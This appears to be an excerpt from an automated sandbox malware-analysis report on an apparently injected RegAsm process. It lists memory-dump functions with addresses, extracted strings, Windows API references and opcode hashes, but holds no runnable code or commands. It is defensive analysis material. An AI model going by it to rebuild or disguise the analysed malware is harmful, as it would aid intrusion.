Instruction ID: cf756583748ce447ec04bafdf05fb0c989b3d7e782480cf65c9f0a4ad3eefef1
Opcode Fuzzy Hash: 2c831e5fffd277e07ffec15d06d23d1f052b0fac6f3af1a6177c1d450d12bf15
Instruction Fuzzy Hash: 7791C074E01218CFDB58DFB9E584A9DBBB2FF89305F609069D809AB354DB359982CF00

Function 06E4C0B1 Relevance: 2.0, Strings: 1, Instructions: 760COMMON

Download Yara Rule

Strings

@B/, xrefs: 06E4C3D7

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID: @B/
API String ID: 0-3863299084
Opcode ID: 61bb4392a05a878b0477ba311f2d815d85edf6e0fc4328c903a4ed3313c665c6
Instruction ID: 9dda7075cda75a718ab9707be75086da6b055400b1f10ec44ae8cddd515183d4
Opcode Fuzzy Hash: 61bb4392a05a878b0477ba311f2d815d85edf6e0fc4328c903a4ed3313c665c6
Instruction Fuzzy Hash: 2382AD74E02229CFDBA4DF69D984BDDBBB2BB49705F1091EAD409A7250DB309E81CF50

Function 06E441E0 Relevance: 1.6, APIs: 1, Instructions: 60libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06E44245

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b429edbeba1ade6c51358f0b730af2181c82316a9b9b31a241ea28d3c65257b5
Instruction ID: 5ec3e81e6c75ffa71ee7b61eedbb9b47880c6260b99b98cb8aae0826bd148841
Opcode Fuzzy Hash: b429edbeba1ade6c51358f0b730af2181c82316a9b9b31a241ea28d3c65257b5
Instruction Fuzzy Hash: 99217D74E02218DFCB48EFA9E484ADDBBF6FB89311F14906AE415B7360DB305851CB64

Function 06E46DD8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\VOi, xrefs: 06E4708F

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID: \VOi
API String ID: 0-2334242610
Opcode ID: 2d9eb18b0d3725c493a8cffafd00af236a866c953e1ba299992eef7c5f29022b
Instruction ID: 887d19a1fee24ae90410f87fa4fe73f031692c0ad346f7e2cd9e766907687b78
Opcode Fuzzy Hash: 2d9eb18b0d3725c493a8cffafd00af236a866c953e1ba299992eef7c5f29022b
Instruction Fuzzy Hash: 40B17C70E003098FDF54DFB9D8957DEBBF2AF89308F149129E815A7294EB349846CB81

Function 06E4A3C8 Relevance: .5, Instructions: 525COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ee5665a06ff67b7038b8575ab62e0f182fb26912858970719b9ed28f5ccb63c
Instruction ID: 189145cc9e94f5b404b3de406c59ead6c9490e59d540b432b6dd1f2e85042959
Opcode Fuzzy Hash: 7ee5665a06ff67b7038b8575ab62e0f182fb26912858970719b9ed28f5ccb63c
Instruction Fuzzy Hash: 8042DE70E01229CFDB64DF69D854BDEBBB2BB89300F1084E9D40AAB254DB315E85CF81

Function 05876948 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2951232791.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5870000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51813a0e17329ff19dc0d6ebfc10fc964383edbc3465502207d3ebefb342fb3d
Instruction ID: f90c8c6ce73c4276d2b617b93af007fa34a3e1f0721331813b338e576761b211
Opcode Fuzzy Hash: 51813a0e17329ff19dc0d6ebfc10fc964383edbc3465502207d3ebefb342fb3d
Instruction Fuzzy Hash: 47220475901228CFDB69DF65C948BE9BBB2FF4A300F0090E9D509A72A1DB359E84CF41

Function 06B867D8 Relevance: .4, Instructions: 424COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acd910af163cb98a3d8b73570ebfdfc440d506eebf9c95e73d803c41288026dc
Instruction ID: 2346e4280d74f953abb0c2ea891b96729d908a6a7819c17df2da40f088633f36
Opcode Fuzzy Hash: acd910af163cb98a3d8b73570ebfdfc440d506eebf9c95e73d803c41288026dc
Instruction Fuzzy Hash: 2FF1F670A002099FCB55EF68D940B9EBBF6FF88304F1485A9E505DB2A2EB34DD45CB91

Function 06E413B0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4c963b9d871e85b0050f192f7e103398535b8f5bc7c86adebc834393a2d6430
Instruction ID: e3911e677fc4067d2f1955d595c6833ae9323df8158490ec56e96ed94d2e46af
Opcode Fuzzy Hash: a4c963b9d871e85b0050f192f7e103398535b8f5bc7c86adebc834393a2d6430
Instruction Fuzzy Hash: E8E131B0E00349DFDB44EFF5D955AAE7BBBEF98200F014429990AA73A4DA349C05CF56

Function 06E413C0 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab5e877ff0b74442d692640a6238c1d76ae982739f15a73eb4e00d563b246b47
Instruction ID: 26bca9c9b1318379a3f76db514cd6bc4bdc46b7a0cfcd080c63663d96ef74153
Opcode Fuzzy Hash: ab5e877ff0b74442d692640a6238c1d76ae982739f15a73eb4e00d563b246b47
Instruction Fuzzy Hash: EAE132B0E00349DFDB44EFF5D955AAE7BBBEF98600F014429990AA73A4DA349C05CF16

Function 06E49218 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 668f1af583c0be0627ed191c65606684a87f925f8597ec0b637120991f9c858b
Instruction ID: 026d0ccd497af29789b08865bb08386f07f5cbd2e11d47ceba6521401edd17d2
Opcode Fuzzy Hash: 668f1af583c0be0627ed191c65606684a87f925f8597ec0b637120991f9c858b
Instruction Fuzzy Hash: 6EF1B070A01229CFDB68DF65D850B9EBBB2BF89304F2081A9C509A7355DB315E85CF51

Function 06E4CE20 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdcecc93c81e9d8ca390ebe75f31217f662cdb8f19924b9ae0e2ce587ea6e116
Instruction ID: 9cf4fa26da32a8c809ab76f3463a6a4b0ddaba215203c1d8f4b46038db9dc0df
Opcode Fuzzy Hash: bdcecc93c81e9d8ca390ebe75f31217f662cdb8f19924b9ae0e2ce587ea6e116
Instruction Fuzzy Hash: 89E1C074E01229CFDB64DFA5C940BAEBBB2BF89300F5091AAD449A7254DB309E85CF51

Function 06B8A688 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d8fecac929a9df093f9c1784cfc4db89924af5954136df198ecb74df881e799
Instruction ID: 299f782050d434b71b60295a60b136338ebd95aaa1c48adb42e04b00d089e3cb
Opcode Fuzzy Hash: 7d8fecac929a9df093f9c1784cfc4db89924af5954136df198ecb74df881e799
Instruction Fuzzy Hash: 84D1E7B0E00218CFDB14EFB4D85469DBBB2FF8A305F1082A9D40AAB754DB395986CF51

Function 06E4B390 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 013ea9c443da4e8c603ffa4fbec48c22e8bd25638c0aa9737e75e97050bd73a1
Instruction ID: dad3a1dac00234af165d77ca11c8fe706c1dabc2994ee3626f32fb613cbcac98
Opcode Fuzzy Hash: 013ea9c443da4e8c603ffa4fbec48c22e8bd25638c0aa9737e75e97050bd73a1
Instruction Fuzzy Hash: 60D1C274E01318CFDB64DFA9D884B9DBBB2BF89304F1091AAD409AB395DB349985CF50

Function 06B8A6B8 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3e04e639baf7d052a10561b8ec685305103e94e42cb87ef7ceb313132913480
Instruction ID: a88b3a2b3d14536084158055ca01ca268cc7301ef01264ed47eb540c14e388e6
Opcode Fuzzy Hash: a3e04e639baf7d052a10561b8ec685305103e94e42cb87ef7ceb313132913480
Instruction Fuzzy Hash: 87D1E5B4A00318CFDB14EFB5D854A9DBBB2FF8A305F108269D40AAB654DB395986CF11

Function 06E48DB0 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 580e902508961fec91893526817031ef6c2c8bbe67a25bdbbca9052d09dee31b
Instruction ID: 21790fda11f533cda0bd45e472591e5b3078080a0c12838eca0fb3777adffafd
Opcode Fuzzy Hash: 580e902508961fec91893526817031ef6c2c8bbe67a25bdbbca9052d09dee31b
Instruction Fuzzy Hash: 85D19E74E01218CFDB64DFA9D984B9DBBB2BF89300F1091AAD409AB355DB309985CF50

Function 05877C20 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2951232791.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5870000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4cfad40fed586e123e6a7c40c87cdab37dd1a0eb6c129021b9d7464eb74feff
Instruction ID: a84a3408dd85e82a044d27c04328652dc29e473c757afbf6c36f2fd9fd30003e
Opcode Fuzzy Hash: c4cfad40fed586e123e6a7c40c87cdab37dd1a0eb6c129021b9d7464eb74feff
Instruction Fuzzy Hash: 9CC1C374E00219CFDB14CFAAD984A9DBBB6FF88300F10D1A9D819AB255DB349D86CF51

Function 06E49858 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c2ec4ce2165eedae844234124d6141b6af6c08a7a712361abceb518d675292d
Instruction ID: ff19a983504911b5e5a22ae8956f4c5c78373ac52bc2fa74e5b74d6437f33002
Opcode Fuzzy Hash: 6c2ec4ce2165eedae844234124d6141b6af6c08a7a712361abceb518d675292d
Instruction Fuzzy Hash: 4EC1D070D01229CFDB68DF65C950BDEBBB2BF89304F1091AAC409BB295DB355A85CF90

Function 06E476A8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 842e2f5ade4572255906b2e391114596331b7583ee56cb7228d2a78001dc8945
Instruction ID: 569a465d2f015d197f22a151abfb30cf62d23ede719309ab5f1e036943326081
Opcode Fuzzy Hash: 842e2f5ade4572255906b2e391114596331b7583ee56cb7228d2a78001dc8945
Instruction Fuzzy Hash: 74B15A70E043198FDF50DFB9E88579DBBF2AF88318F149529D818A7294EB749885CBC1

Function 06E49208 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59728c9c9d35961ce9aa9516ce570cbc4d10554b4ee3fdfad48a628f081e4759
Instruction ID: 6eac9cb2209a52147912d2825e364dfc5fa27895443562db15506ca5d74b5df3
Opcode Fuzzy Hash: 59728c9c9d35961ce9aa9516ce570cbc4d10554b4ee3fdfad48a628f081e4759
Instruction Fuzzy Hash: 7DA1C370E01229CFDB24DFA5D850B9EBBB2FF88304F2081AAD5096B295DB355E85CF51

Function 05877C10 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2951232791.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5870000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a97dcc03011d2db18b5a3a857b6520891455d65e3fcab07a27a39bf460bed2d
Instruction ID: 3065fbece5774798b7636b236847874bf8408cd09dc01c5460a50a0fc53d48b9
Opcode Fuzzy Hash: 8a97dcc03011d2db18b5a3a857b6520891455d65e3fcab07a27a39bf460bed2d
Instruction Fuzzy Hash: 7D51C775E00219CBEB18CFAAD94479DFBB7BF88304F14C0A9881DA7269DB345946CF50

Function 06B60D80 Relevance: 20.6, Strings: 16, Instructions: 625
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06B60FB8
$]q, xrefs: 06B61455
$]q, xrefs: 06B613AC
$]q, xrefs: 06B60E02
$]q, xrefs: 06B613EB
$]q, xrefs: 06B60E78
$]q, xrefs: 06B61430
$]q, xrefs: 06B61336
$]q, xrefs: 06B60E52
$]q, xrefs: 06B6137B
$]q, xrefs: 06B60F36
$]q, xrefs: 06B60FAC
$]q, xrefs: 06B613A0
$]q, xrefs: 06B61461
$]q, xrefs: 06B60F86
$]q, xrefs: 06B60E84

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-2551331179
Opcode ID: 15ff2d40f31f19bad7bfdf2e7a1ed0eb8ee9b8b324164ae9389a3b9bfe466a41
Instruction ID: 3ae85c3d276e27665d0b56d0011ae7e91180343bb1de34bc41fd19572d1e44fa
Opcode Fuzzy Hash: 15ff2d40f31f19bad7bfdf2e7a1ed0eb8ee9b8b324164ae9389a3b9bfe466a41
Instruction Fuzzy Hash: 4332B470B002459FDB95DB6EC95496EBBF6FF89700B1094A9E906CB3A1CB78DC01CB91

Function 06B61584 Relevance: 7.8, Strings: 6, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06B61A57
$]q, xrefs: 06B6182E
$]q, xrefs: 06B618E3
$]q, xrefs: 06B61A7C
$]q, xrefs: 06B61A88
$]q, xrefs: 06B61A12

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: ac057f65598ffe353bb4651bcd9866af2618928210d42a83ff9d5b6a839c0df7
Instruction ID: 05f3a95b7f810baf9dce87f4aeb2a96aeb0e214ff8e9ffeb107de4699dbf4c7e
Opcode Fuzzy Hash: ac057f65598ffe353bb4651bcd9866af2618928210d42a83ff9d5b6a839c0df7
Instruction Fuzzy Hash: E0C1D374B002158FDB54CB6EC894A3A7BE7EF85704F1098AAE5028B3A1DF78DC05CB91

Function 06B83F50 Relevance: 2.9, Strings: 2, Instructions: 397
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06B841E4
k #m^, xrefs: 06B84375

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$k #m^
API String ID: 0-2108030852
Opcode ID: d0533858124b37eb30ab1c935fc9ba7c739f05120a9c7dfb725f26d351f0f92e
Instruction ID: 959e24423c2a7b1f49dc44ae689e0778362dfdbfdd870a187a112e5afb1e517b
Opcode Fuzzy Hash: d0533858124b37eb30ab1c935fc9ba7c739f05120a9c7dfb725f26d351f0f92e
Instruction Fuzzy Hash: 95E13F74F002168FCB54EF69C594AAEBBF6FF88600B1591A9D906EB365DB34DC01CB90

Function 06B88C88 Relevance: 2.7, Strings: 2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 06B88D00
(aq, xrefs: 06B88D2C

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: (aq$(aq
API String ID: 0-3916115647
Opcode ID: 5ef4cb9c97e835863c099f7c2cc8fff82fba7621c10061877b952a757d76b52e
Instruction ID: 76dbcc087efcaa2bded2e0347b194c19611ea8dee52556f764117503b92cb787
Opcode Fuzzy Hash: 5ef4cb9c97e835863c099f7c2cc8fff82fba7621c10061877b952a757d76b52e
Instruction Fuzzy Hash: 6341F67070429A5FCB499E7994107BF7FA6AFD5650F1484AAE809DB395DE34CC02C3E2

Function 06B61291 Relevance: 2.6, Strings: 2, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06B613EB
$]q, xrefs: 06B61336

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: ec13f305dd0a02290867eac4777554d7e58662918b9a51174707a07885720207
Instruction ID: 6d22441b6dde3891eb2c0ee419dac911ee10c7a2773c988c4ce7dab7580ef604
Opcode Fuzzy Hash: ec13f305dd0a02290867eac4777554d7e58662918b9a51174707a07885720207
Instruction Fuzzy Hash: 3F41E8B47402019FDB949AAEC850A7A769BEF99B04F109469FE02CB3D1CEB9CC01C791

Function 06B848A8 Relevance: 1.8, Strings: 1, Instructions: 515COMMON

Download Yara Rule

Strings

+ #m^, xrefs: 06B84DA7

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: + #m^
API String ID: 0-1058273229
Opcode ID: a089c0248aa24f104844aa57d571fed71eed975bef6880e402c6650131efd9ae
Instruction ID: de0cb62e3dad1caeb84ff9eececd76c4581894007b94ceec35bfd68d66999ce2
Opcode Fuzzy Hash: a089c0248aa24f104844aa57d571fed71eed975bef6880e402c6650131efd9ae
Instruction Fuzzy Hash: 28123774B006068FCB54EF29D588A6ABBF6FF89305B1584A9E506CB372DB34EC45CB50

Function 015AAE30 Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 015AB086

Memory Dump Source

Source File: 00000009.00000002.2860265659.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2ec7364baf017bbb51ee400133b3322c1c68f620a5a933e979c555ef2fcc6b41
Instruction ID: 3dd0803bb132ef471d9f3aa611cc2092a4cc765dff1d25f92e6ba94207db5ddd
Opcode Fuzzy Hash: 2ec7364baf017bbb51ee400133b3322c1c68f620a5a933e979c555ef2fcc6b41
Instruction Fuzzy Hash: B57155B0A00B468FD728CF29D54075EBBF5FF88204F00892ED55ADBA50DB39E949CB90

Function 06E43FFF Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 06E44158

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a64c19ea48a2b34954f060d0a9e958dd9015e151bd25971ef5361f516cf5bb8b
Instruction ID: 5d5b68b2ce8418a0d6364c08ff9ba216fdbe3a87bea052845586ca857092147c
Opcode Fuzzy Hash: a64c19ea48a2b34954f060d0a9e958dd9015e151bd25971ef5361f516cf5bb8b
Instruction Fuzzy Hash: AB51E374E01209CFDB08DFA9E5446EDBBF2FB88304F20902AD406AB364EB345916CF90

Function 015A5935 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 015A59F1

Memory Dump Source

Source File: 00000009.00000002.2860265659.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegAsm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ca5ee1d054bdea21962b80ff3f221f43ce58911b199ab40817c3c6a058c470ba
Instruction ID: 0e560a8555d4ba9421d171b642b0287e844ea9d65325911d5a7cb8c8bc3131e0
Opcode Fuzzy Hash: ca5ee1d054bdea21962b80ff3f221f43ce58911b199ab40817c3c6a058c470ba
Instruction Fuzzy Hash: 0241D2B0D00719CEDB24CFA9C994B9DBBB5FF49304F20845AD408AB254DBB56949CF91

Function 05870BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05874381

Memory Dump Source

Source File: 00000009.00000002.2951232791.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5870000_RegAsm.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 1a4063d707bf1a12b0f7a3dab85adce7a41661881adf97a9f7dc451e2d002b82
Instruction ID: b9051170930c26f07207a23fbe5544466d0d9920eee28cd7ae8910ab2c98245c
Opcode Fuzzy Hash: 1a4063d707bf1a12b0f7a3dab85adce7a41661881adf97a9f7dc451e2d002b82
Instruction Fuzzy Hash: D341F6B59003098FCB14CF99C488EAABBF5FF88314F248559E519AB321D774A845CBA0

Function 015A4248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 015A59F1

Memory Dump Source

Source File: 00000009.00000002.2860265659.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegAsm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4e9e03dca0e9d85de669956559752e0e9462e95032a01d85f0de883e4ac09309
Instruction ID: 4ab82fae6ce4b50ba1783ebd6e057d0bab51bf8a7c785218dec75f7fa626f2e9
Opcode Fuzzy Hash: 4e9e03dca0e9d85de669956559752e0e9462e95032a01d85f0de883e4ac09309
Instruction Fuzzy Hash: 4641FFB0D00719CEDB24CFA9C884B9DBBF5FF49304F60846AD408AB250DBB5694ACF91

Function 06E44082 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 06E44158

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 39605de3dbdc5ff62282f81d3db894e0d87d1179a1efc039958ec445eb9ccff1
Instruction ID: 0b7dbf4adc868b3bcae346ba47a7753f0ca7ad0c8df11fd2a1ad69ca841160e6
Opcode Fuzzy Hash: 39605de3dbdc5ff62282f81d3db894e0d87d1179a1efc039958ec445eb9ccff1
Instruction Fuzzy Hash: A831B274E01209CFCB04DFA8E594A9DBBB2FF48304F20906AD51AAB354DB345D51CF91

Function 015AC9A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015AD2C6,?,?,?,?,?), ref: 015AD387

Memory Dump Source

Source File: 00000009.00000002.2860265659.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bfee9f911f84cb4142891a3042a1d11168ef60cc39150e0714337eda001b70f2
Instruction ID: f1f3e831103b808f14131d5be8c81e84b4a9aa87ed105c3fb928d4ae5eed0a2b
Opcode Fuzzy Hash: bfee9f911f84cb4142891a3042a1d11168ef60cc39150e0714337eda001b70f2
Instruction Fuzzy Hash: 8121B3B59002489FDB10DF9AD984AEEBFF4FB48310F14841AE919A7310D378A954CFA5

Function 06B859C8 Relevance: 1.6, Strings: 1, Instructions: 313COMMON

Download Yara Rule

Strings

d, xrefs: 06B85C29

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 1b876ba48630ea2f734a1bf3efc98cb299da953287c04b46c1000c9f1effbec7
Instruction ID: ab3cff17dec7d7118b1a13284167669c9c18d3650c37ccf06c3bd35772080c13
Opcode Fuzzy Hash: 1b876ba48630ea2f734a1bf3efc98cb299da953287c04b46c1000c9f1effbec7
Instruction Fuzzy Hash: 7ED15A75600602CFC7A4DF19C5809AABBF2FF89310729CA99D45A9B666D730FC46CF90

Function 015AD2F9 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015AD2C6,?,?,?,?,?), ref: 015AD387

Memory Dump Source

Source File: 00000009.00000002.2860265659.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegAsm.jbxd

